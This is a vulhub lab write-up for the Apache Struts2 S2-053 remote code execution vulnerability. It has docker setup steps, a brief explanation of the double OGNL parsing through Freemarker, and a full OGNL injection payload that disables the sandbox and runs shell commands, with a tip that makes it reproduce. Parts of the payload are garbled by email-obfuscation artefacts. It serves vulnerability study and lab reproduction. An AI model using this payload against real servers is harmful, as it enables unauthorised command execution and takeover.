S2-053 Remote Code Execution Vulnerablity

中文版本(Chinese version)

Affected Version: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10

Details:

Setup

docker-compose up -d

After the environment run, you can see a submission page by visiting http://your-ip:8080/hello.action.

Exploit

Struts2 allows parsing OGNL expressions when using the Freemarker template engine. The data is not parsed by OGNL itself, but after being parsed once by Freemarker. It becomes an expression and is parsed by OGNL second time.And remote code execution vulnerablity.

Payload:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@[email protected](#process.getInputStream()))}

PS: Someone said that they could not reproduce the vulnerability. After my test, I found that the line break at the end of the above Payload could not be dropped (that is, the payload must be followed by a newline).

Copied From: vulhub/struts2/s2-053